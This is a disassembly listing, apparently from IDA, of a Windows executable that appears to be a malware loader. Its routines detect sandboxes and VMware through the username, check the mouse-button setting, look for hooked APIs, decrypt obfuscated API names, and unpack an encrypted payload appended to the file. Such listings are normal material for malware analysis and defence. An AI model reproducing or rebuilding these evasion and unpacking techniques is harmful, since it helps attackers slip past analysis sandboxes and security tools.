pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401C16: ; CODE XREF: sub_4018F0+1BD�j
; sub_4018F0+1CB�j ...
push edi ; hLibModule
call ds:FreeLibrary ; FreeLibrary
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn
sub_4018F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C30 proc near ; CODE XREF: start+24�p
push esi
push edi
push 9
push offset ModuleName ; ")1}"
push offset a0x001xfdk ; "0x001xFDK"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aKQ ; ", k\x1Bï"
mov eax, ecx
mov esi, edi
mov edi, offset ModuleName ; ")1}"
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset aO ; "&!o"
mov edx, ecx
mov esi, edi
mov edi, offset aKQ ; ", k\x1Bï"
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset dword_404028
mov eax, ecx
mov esi, edi
mov edi, offset aO ; "&!o"
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset dword_404038
mov edx, ecx
mov esi, edi
mov edi, offset dword_404028
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push 12h
mov eax, ecx
mov esi, edi
mov edi, offset dword_404038
push offset ProcName
shr ecx, 2
rep movsd
mov ecx, eax
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 14h
mov edx, ecx
mov esi, edi
mov edi, offset ProcName
push offset dword_40405C
shr ecx, 2
rep movsd
mov ecx, edx
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset dword_404074
mov eax, ecx
mov esi, edi
mov edi, offset dword_40405C
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset dword_404080
mov edx, ecx
mov esi, edi
mov edi, offset dword_404074
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, offset dword_404080
shr ecx, 2
rep movsd
mov ecx, eax
push 10h
and ecx, 3
push offset byte_404090
rep movsb
push offset a0x001xfdk ; "0x001xFDK"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 11h
repne scasb
not ecx
sub edi, ecx
push offset dword_4040A4
mov edx, ecx
mov esi, edi
mov edi, offset byte_404090
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset dword_4040B8
mov eax, ecx
mov esi, edi
mov edi, offset dword_4040A4
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 10h
mov edx, ecx
mov esi, edi
mov edi, offset dword_4040B8
push offset dword_4040C8
shr ecx, 2
rep movsd
mov ecx, edx
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 12h
repne scasb
not ecx
sub edi, ecx
push offset dword_4040DC
mov eax, ecx
mov esi, edi
mov edi, offset dword_4040C8
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push 10h
mov edx, ecx
mov esi, edi
mov edi, offset dword_4040DC
push offset dword_4040F0
shr ecx, 2
rep movsd
mov ecx, edx
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset dword_404104
mov eax, ecx
mov esi, edi
mov edi, offset dword_4040F0
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset dword_404114
mov edx, ecx
mov esi, edi
mov edi, offset dword_404104
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 10h
repne scasb
not ecx
sub edi, ecx
push offset dword_404120
mov eax, ecx
mov esi, edi
mov edi, offset dword_404114
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edx, ecx
mov edi, offset dword_404120
shr ecx, 2
rep movsd
mov ecx, edx
push 0Bh
and ecx, 3
push offset dword_404134
rep movsb
push offset a0x001xfdk ; "0x001xFDK"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset dword_404148
mov eax, ecx
mov esi, edi
mov edi, offset dword_404134
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset byte_404158
mov edx, ecx
mov esi, edi
mov edi, offset dword_404148
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 5
repne scasb
not ecx
sub edi, ecx
push offset dword_404140
mov eax, ecx
mov esi, edi
mov edi, offset byte_404158
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 11h
repne scasb
not ecx
sub edi, ecx
push offset dword_404168
mov edx, ecx
mov esi, edi
mov edi, offset dword_404140
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 13h
repne scasb
not ecx
sub edi, ecx
push offset dword_40417C
mov eax, ecx
mov esi, edi
mov edi, offset dword_404168
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 1Eh
mov edx, ecx
mov esi, edi
mov edi, offset dword_40417C
push offset dword_404190
shr ecx, 2
rep movsd
mov ecx, edx
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset dword_4041B0
mov eax, ecx
mov esi, edi
mov edi, offset dword_404190
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 8
repne scasb
not ecx
sub edi, ecx
push offset dword_4041BC
mov edx, ecx
mov esi, edi
mov edi, offset dword_4041B0
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, offset dword_4041BC
push 0Dh
shr ecx, 2
rep movsd
mov ecx, eax
push offset byte_4041C8
and ecx, 3
push offset a0x001xfdk ; "0x001xFDK"
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Eh
repne scasb
not ecx
sub edi, ecx
push offset dword_4041D8
mov edx, ecx
mov esi, edi
mov edi, offset byte_4041C8
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Ch
repne scasb
not ecx
sub edi, ecx
push offset byte_4041F8
mov eax, ecx
mov esi, edi
mov edi, offset dword_4041D8
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 48h
repne scasb
not ecx
sub edi, ecx
push 0Bh
mov edx, ecx
mov esi, edi
mov edi, offset byte_4041F8
push offset dword_404208
shr ecx, 2
rep movsd
mov ecx, edx
push offset a0x001xfdk ; "0x001xFDK"
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 10h
repne scasb
not ecx
sub edi, ecx
push offset dword_404214
mov eax, ecx
mov esi, edi
mov edi, offset dword_404208
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push offset a0x001xfdk ; "0x001xFDK"
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
push 0Bh
repne scasb
not ecx
sub edi, ecx
push offset dword_404228
mov edx, ecx
mov esi, edi
mov edi, offset dword_404214
push offset a0x001xfdk ; "0x001xFDK"
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
call sub_401040
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 24h
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, offset dword_404228
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
sub_401C30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022E0 proc near ; CODE XREF: sub_4025D0+86�p
; sub_4025D0+A5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_4]
push esi
push edi
cmp byte ptr [ebp+0], 0
jnz short loc_4022F5
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4022F5: ; CODE XREF: sub_4022E0+B�j
mov edi, [esp+0Ch+arg_0]
cmp byte ptr [edi], 0
jz short loc_40231A
loc_4022FE: ; CODE XREF: sub_4022E0+38�j
mov esi, edi
mov ecx, ebp
sub esi, ebp
loc_402304: ; CODE XREF: sub_4022E0+30�j
mov dl, [ecx]
test dl, dl
jz short loc_402320
mov al, [esi+ecx]
inc ecx
cmp al, dl
jz short loc_402304
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4022FE
loc_40231A: ; CODE XREF: sub_4022E0+1C�j
pop edi
pop esi
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402320: ; CODE XREF: sub_4022E0+28�j
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_4022E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402330 proc near ; CODE XREF: sub_4012C0+BF�p
; sub_4012C0+12C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
push edi
cmp esi, eax
mov ecx, eax
jnb short loc_40235D
mov ecx, [esp+8+arg_8]
test ecx, ecx
lea edx, [esi+ecx]
lea esi, [eax+ecx]
jz short loc_402372
mov edi, ecx
loc_402350: ; CODE XREF: sub_402330+28�j
mov cl, [edx-1]
dec edx
dec esi
dec edi
mov [esi], cl
jnz short loc_402350
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_402330+E�j
jz short loc_402372
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_402372
sub esi, eax
loc_402369: ; CODE XREF: sub_402330+40�j
mov dl, [esi+ecx]
mov [ecx], dl
inc ecx
dec edi
jnz short loc_402369
loc_402372: ; CODE XREF: sub_402330+1C�j
; sub_402330:loc_40235D�j ...
pop edi
pop esi
retn
sub_402330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402380 proc near ; CODE XREF: start+53�p
mov eax, dword_4042E0
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_4042C0
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_404294
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_404298
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_4042A8
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_40428C
mov al, [eax]
cmp al, 0E8h
jz loc_402494
cmp al, 0E9h
jz loc_402494
mov eax, dword_4042AC
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042B4
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042BC
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042E4
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042D8
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042D0
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_404290
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042F4
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
mov eax, dword_4042B8
mov al, [eax]
cmp al, 0E8h
jz short loc_402494
cmp al, 0E9h
jz short loc_402494
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402494: ; CODE XREF: sub_402380+9�j
; sub_402380+11�j ...
mov eax, 1
retn
sub_402380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4024A0 proc near ; CODE XREF: start+7D�p
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 8
push ebx
push esi
push edi
push 0 ; lpModuleName
xor bl, bl
call ds:GetModuleHandleA ; GetModuleHandleA
mov ecx, [eax+3Ch]
push eax ; hObject
lea edx, [ecx+eax+4]
xor ecx, ecx
mov cx, [edx+10h]
lea esi, [ecx+edx+14h]
xor ecx, ecx
mov cx, [edx+2]
lea edx, [ecx+ecx*4]
lea ecx, [esi+edx*8]
mov esi, [esi+edx*8-18h]
mov edx, [ecx-14h]
add esi, edx
call ds:CloseHandle ; CloseHandle
push 0 ; dwErrCode
call ds:SetLastError
mov eax, [esp+14h+arg_0]
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push eax
call dword_4042C4
mov edi, eax
call ds:GetLastError
test eax, eax
jnz short loc_402577
cmp edi, 0FFFFFFFFh
jz short loc_402577
lea ecx, [esp+14h+var_8]
push ecx
push edi
call dword_4042CC
mov eax, [esp+14h+var_8]
cmp eax, esi
jbe short loc_402567
sub eax, esi
push ebp
mov ebx, eax
push 1
lea edx, [ebx+1]
push edx
call sub_401000
add esp, 8
mov ebp, eax
push 0
push 0
push esi
push edi
call dword_4042F8
lea eax, [esp+18h+var_4]
push 0
push eax
push ebx
push ebp
push edi
call dword_4042B0
mov ecx, [esp+18h+arg_4]
mov edx, [esp+18h+arg_8]
mov [ecx], ebp
mov [edx], ebx
mov bl, 1
pop ebp
loc_402567: ; CODE XREF: sub_4024A0+85�j
push edi ; hObject
call ds:CloseHandle ; CloseHandle
pop edi
mov al, bl
pop esi
pop ebx
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_402577: ; CODE XREF: sub_4024A0+6C�j
; sub_4024A0+71�j
pop edi
pop esi
xor al, al
pop ebx
add esp, 8
retn
sub_4024A0 endp
; =============== S U B R O U T I N E =======================================
sub_402580 proc near ; CODE XREF: sub_4025D0+7D�p
; sub_4025D0+9C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push edi
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 1
mov edi, ecx
lea eax, [edi+1]
push eax
call sub_401000
add esp, 8
test edi, edi
jle short loc_4025C4
push esi
mov esi, eax
mov edx, ebx
sub esi, ebx
loc_4025AD: ; CODE XREF: sub_402580+41�j
mov cl, [edx]
cmp cl, 41h
jl short loc_4025BC
cmp cl, 5Ah
jg short loc_4025BC
add cl, 20h
loc_4025BC: ; CODE XREF: sub_402580+32�j
; sub_402580+37�j
mov [esi+edx], cl
inc edx
dec edi
jnz short loc_4025AD
pop esi
loc_4025C4: ; CODE XREF: sub_402580+24�j
pop edi
pop ebx
retn
sub_402580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: start+4A�p
var_10C = byte ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
sub esp, 108h
push ebx
push esi
push edi
mov ecx, 40h
xor eax, eax
lea edi, [esp+114h+var_103]
mov [esp+114h+var_104], 0
mov [esp+114h+var_108], 104h
rep stosd
stosw
stosb
lea eax, [esp+114h+var_108]
lea ecx, [esp+114h+var_104]
push eax
push ecx
call dword_4042E8
mov esi, offset aCurrentuser ; "CurrentUser"
lea eax, [esp+11Ch+var_10C]
loc_40260F: ; CODE XREF: sub_4025D0+61�j
mov dl, [eax]
mov bl, [esi]
mov cl, dl
cmp dl, bl
jnz short loc_402637
test cl, cl
jz short loc_402633
mov dl, [eax+1]
mov bl, [esi+1]
mov cl, dl
cmp dl, bl
jnz short loc_402637
add eax, 2
add esi, 2
test cl, cl
jnz short loc_40260F
loc_402633: ; CODE XREF: sub_4025D0+4B�j
xor eax, eax
jmp short loc_40263C
; ---------------------------------------------------------------------------
loc_402637: ; CODE XREF: sub_4025D0+47�j
; sub_4025D0+57�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40263C: ; CODE XREF: sub_4025D0+65�j
pop edi
pop esi
test eax, eax
pop ebx
jz short loc_40268A
lea eax, [esp+110h+var_10C]
push offset aSandbox ; "sandbox"
push eax
call sub_402580
add esp, 4
push eax
call sub_4022E0
add esp, 8
test eax, eax
jnz short loc_40268A
lea ecx, [esp+110h+var_10C]
push offset aVmware ; "vmware"
push ecx
call sub_402580
add esp, 4
push eax
call sub_4022E0
add esp, 8
test eax, eax
jnz short loc_40268A
xor al, al
add esp, 108h
retn
; ---------------------------------------------------------------------------
loc_40268A: ; CODE XREF: sub_4025D0+71�j
; sub_4025D0+90�j ...
mov al, 1
add esp, 108h
retn
sub_4025D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: start:loc_40279D�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
sub esp, 2Ch
push ebx
push edi
mov ecx, 7
xor eax, eax
lea edi, [esp+34h+var_1F]
mov [esp+34h+var_20], 0
rep stosd
stosw
stosb
lea eax, [esp+34h+var_2C]
mov ebx, 1
push eax
push offset aControlPanelMo ; "Control Panel\\Mouse"
push 80000001h
mov [esp+40h+var_28], 1Fh
mov [esp+40h+var_24], ebx
call dword_4042DC
test eax, eax
jnz short loc_40274E
lea ecx, [esp+34h+var_28]
lea edx, [esp+34h+var_20]
push ecx
mov ecx, [esp+38h+var_2C]
lea eax, [esp+38h+var_24]
push edx
push eax
push 0
push offset aSwapmousebutto ; "SwapMouseButtons"
push ecx
call dword_4042A4
test eax, eax
jnz short loc_402743
push esi
mov esi, offset a0 ; "0"
lea eax, [esp+38h+var_20]
loc_402713: ; CODE XREF: sub_4026A0+91�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_402737
test cl, cl
jz short loc_402733
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_402737
add eax, 2
add esi, 2
test cl, cl
jnz short loc_402713
loc_402733: ; CODE XREF: sub_4026A0+7D�j
xor eax, eax
jmp short loc_40273C
; ---------------------------------------------------------------------------
loc_402737: ; CODE XREF: sub_4026A0+79�j
; sub_4026A0+87�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40273C: ; CODE XREF: sub_4026A0+95�j
test eax, eax
pop esi
jnz short loc_402743
xor bl, bl
loc_402743: ; CODE XREF: sub_4026A0+67�j
; sub_4026A0+9F�j
mov eax, [esp+34h+var_2C]
push eax
call dword_4042EC
loc_40274E: ; CODE XREF: sub_4026A0+42�j
mov al, bl
pop edi
pop ebx
add esp, 2Ch
retn
sub_4026A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
sub esp, 114h
push edi
mov ecx, 40h
xor eax, eax
lea edi, [esp+118h+var_103]
mov [esp+118h+var_104], 0
mov [esp+118h+var_10C], 0
rep stosd
stosw
stosb
call sub_401C30
call sub_4018F0
test al, al
pop edi
jnz short loc_40279D
or eax, 0FFFFFFFFh
add esp, 114h
retn
; ---------------------------------------------------------------------------
loc_40279D: ; CODE XREF: start+31�j
call sub_4026A0
test al, al
jnz loc_40282D
call sub_4025D0
test al, al
jnz short loc_40282D
call sub_402380
test eax, eax
jnz short loc_40282D
lea eax, [esp+114h+var_104]
push 104h
push eax
push 0
call dword_4042C0
lea ecx, [esp+114h+var_110]
lea edx, [esp+114h+var_114]
push ecx
lea eax, [esp+118h+var_104]
push edx
push eax
call sub_4024A0
add esp, 0Ch
test al, al
jz short loc_40282D
mov ecx, [esp+114h+var_110]
mov edx, [esp+114h+var_114]
push ecx
push edx
push offset a0x001xfdk ; "0x001xFDK"
call sub_401040
mov edx, [esp+120h+var_110]
lea ecx, [esp+120h+var_108]
push ecx
push edx
push eax
mov [esp+12Ch+var_114], eax
call sub_401190
mov edx, [esp+12Ch+var_108]
lea ecx, [esp+12Ch+var_10C]
push ecx ; int
push offset String2 ; lpString2
push edx ; int
push eax ; int
mov [esp+13Ch+var_114], eax
call sub_401870
add esp, 28h
loc_40282D: ; CODE XREF: start+44�j start+51�j ...
xor eax, eax
add esp, 114h
retn
start endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00003000)
; Virtual size : 00000128 ( 296.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00003000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+E�p
; DATA XREF: sub_401000+E�r
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_401030+5�p
; DATA XREF: sub_401030+5�r
; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
extrn lstrcatA:dword ; CODE XREF: sub_401460+3A�p
; DATA XREF: sub_401460+3A�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401520+9�p
; sub_4018F0+1C�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_4018F0+327�p
; DATA XREF: sub_4018F0+327�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_4018F0+35�p
; sub_4018F0+42�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_4018F0+9�p
; sub_4024A0+A�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_4024A0+64�p
; DATA XREF: sub_4024A0+64�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_4024A0+3F�p
; DATA XREF: sub_4024A0+3F�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_4024A0+37�p
; sub_4024A0+C8�p
; DATA XREF: ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 403028h
dd 0
dd 3054h, 2 dup(0)
dd 311Ah, 3000h, 5 dup(0)
dd 3080h, 308Eh, 309Ch, 30A8h, 30B8h, 30C6h, 30D8h, 30ECh
dd 30FCh, 310Ch, 0
dd 6C470181h, 6C61626Fh, 6F6C6C41h, 1880063h, 626F6C47h
dd 72466C61h, 6565h, 736C02F9h, 61637274h, 4174h, 6F4C01C2h
dd 694C6461h, 72617262h, 4179h, 724600B4h, 694C6565h, 72617262h
dd 13E0079h, 50746547h, 41636F72h, 65726464h, 7373h, 65470126h
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6547011Ah, 73614C74h
dd 72724574h, 726Fh, 65530271h, 73614C74h, 72724574h, 726Fh
dd 6C43001Bh, 4865736Fh, 6C646E61h, 454B0065h, 4C454E52h
dd 642E3233h, 6C6Ch, 36h dup(0)
_rdata ends
; Section 3. (virtual address 00004000)
; Virtual size : 00000301 ( 769.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 404000h
a0x001xfdk db '0x001xFDK',0 ; DATA XREF: sub_401C30+9�o
; sub_401C30+30�o ...
align 4
; char ModuleName[]
ModuleName db ')1}' ; DATA XREF: sub_4018F0+4�o
; sub_401C30+4�o ...
db 19h
aCs db 'æSÔØì',0
align 4
; char aKQ[]
aKQ db ', k',1Bh,'ï' ; DATA XREF: sub_4018F0+15�o
; sub_401C30+22�o ...
db 11h, 83h, 86h
aObT db '®B^â',0
align 4
; const CHAR dword_404028
dword_404028 dd 16B2C11h, 0F5DC1CFFh, 0ED5D4AECh, 0 ; sub_401C30+88�o ...
; const CHAR dword_404038
dword_404038 dd 16B2C11h, 0F5DC1CFFh, 0ED5D4AECh, 18CAh ; sub_401C30+BB�o ...
; const CHAR ProcName
ProcName db 0 ; DATA XREF: sub_4018F0+44�o
; sub_401C30+F7�o ...
db 20h, 6Dh, 38h
dd 0D8C519E5h, 0E25B60E5h, 0EBD52EEAh, 1D35h
; const CHAR dword_40405C
dword_40405C dd 1B4C321Dh, 0E2C01CE7h, 0C14543E9h, 0E5D133E9h, 0EDE23524h
; DATA XREF: sub_4018F0+51�o
; sub_401C30+12D�o ...
dd 0
; const CHAR dword_404074
dword_404074 dd 107C3701h, 0C6D214C6h, 4B54E1h ; sub_401C30+157�o ...
; const CHAR dword_404080
dword_404080 dd 147C3704h, 0C6E018FEh, 0FD5745EFh, 21FCh ; sub_401C30+18A�o ...
; const CHAR byte_404090
byte_404090 db 0 ; DATA XREF: sub_4018F0+78�o
; sub_401C30+1D0�o ...
db 20h, 6Dh, 21h
dd 0D5D50FE2h, 0E05D65E4h, 0F2CC05FBh, 0
